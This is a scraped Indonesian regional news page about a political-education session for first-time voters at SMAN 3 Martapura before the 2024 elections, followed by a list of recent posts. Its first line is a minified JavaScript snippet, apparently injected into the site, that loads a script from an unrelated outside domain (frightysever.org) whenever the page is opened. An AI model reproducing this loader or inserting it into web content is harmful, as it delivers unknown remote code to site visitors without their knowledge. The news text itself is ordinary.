(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Pendidikan Politik bagi Pemilih Pemula di SMAN 3 Martapura


KANALKALIMANTAN.COM, MARTAPURA – Jelang Pemilihan Umum (Pemilu) tahun 2024, Badan Kesbangpol Kabupaten Banjar membekali beri pendidikan politik kepada pemilih pemula di SMAN 3 Martapura, Senin (30/5/2022).

Pendidikan politik dibuka oleh Sekretaris Badan Kesbangpol Banjar Wasis Nugraha menghadirkan narasumber dari Dinas Pendidikan Kalsel H Eddy Khairuddin dan Mada Taruna Staf Ahli Bupati Banjar.

Wasis Nugraha mengatakan, para pelajar yang masuk kategori pemilih pemula serius menghadapi dan menggunakan hak pilihnya pada 14 Febuari 2024 dalam Pilpres, Pileg dan Pilkada Serentak.

“Pendidikan politik bagi pemilih pemula sangatlah penting, karena akan memberikan kontribusi yang signifikan bagi sistem perpolitikan nasional,” ujarnya.

 

Baca juga  : Lapas Kelas II A Kotabaru Antisipasi Gangguan Keamanan

Para pemilih pemula diharapkan menggunakan hak pilih yang sebaik-baiknya sesuai hati nurani. Pemlih pemula juga diminta meelusuri visi misi program kerja partai atai calon yang akan dipilih.

“Jangan sembarangan untuk memilih pemimpin, jangan mudah termakan berita hoaks pandailah menyaring berita yang benar, harus cermat, teliti, hati-hati jangan sampai golput nantinya,” ujar Wasis.

Sementara itu, Eddy Khairuddin mengatakan, pentingnya pemilu memberikan kesempatan bagi setiap warga negara untuk menggunakan hak pilih. Sehingga dapat dikatakan tidak ada negara demokrasi tanpa memberikan adanya pemilihan umum yang dilakukan secara sistematik dan berkala.

Ditambahkan Eddy, sistem politik yang dianut oleh Indonesia ini mempunyai arti sebagai sistem politik yang didasarkan pada nilai, prinsip, prosedur, dan kelembagaan yang demokratis.

 

Baca juga  : “Protect the Environment” Tema Hari Tanpa Tembakau Sedunia 2022

Sistem politik demokrasi di Indonesia memiliki beberapa sendi-sendi pokok diantaranya kedaulatan rakyat, negara berdasarkan atas hukum, bentuk Republik, pemerintahan berdasarkan konstitusi, pemerintahan yang bertanggung jawab, sistem perwakilan, dan sistem pemerintahan presidensial.

Staf Ahli Bupati Mada Taruna mengharapkan, pemilih pemula harus faham sistem politik dan bijak dalam pemilihan yang tepat. “Serahkan pada ahlinya, jangan jual negeri ini untuk kepentingan pribadi keluarga atau kelompoknya,” ingat Mada Taruna.

Karena cinta negeri sebagian dari iman, apabila tidak ada orang baik yang mau terlibat berpolitik maka negeri ini dikuasai oleh penjahat.

“Negeri ini tercipta dibangun dengan perjuangan bukan dengan transaksional, semoga siswa-siswi sekalian mengerti dalam memilih pemimpin yang baik dan berdaulat,” pungkasnya. (Kanalkalimantan.com/rls)

Reporter : rls
Editor : kk


Desy Arfianty

Recent Posts

Kunker DPRD Kapuas Perkaya Referensi Raperda Bangunan Gedung

KANALKALIMANTAN.COM, KUALA KAPUAS – Panitia Khusus (Pansus) I Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas… Read More

8 jam ago

Haul Dua Wali Allah di Cempaka yang Sangat Dermawan dan Hidup Sederhana

KANALKALIMANTAN.COM, BANJARBARU - Haul Syarifah Badrun Al Qadiri Al Hasani bin Sayyid Yusuf Al-Qadiri Al-Hasani… Read More

10 jam ago

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

12 jam ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

14 jam ago

TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

KANALKALIMANTAN.COM, AMUNTAI – Membangun ulang Rumah Tidak Layak Huni (RTLH) menjadi layak huni menjadi salah… Read More

14 jam ago

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

14 jam ago

This website uses cookies.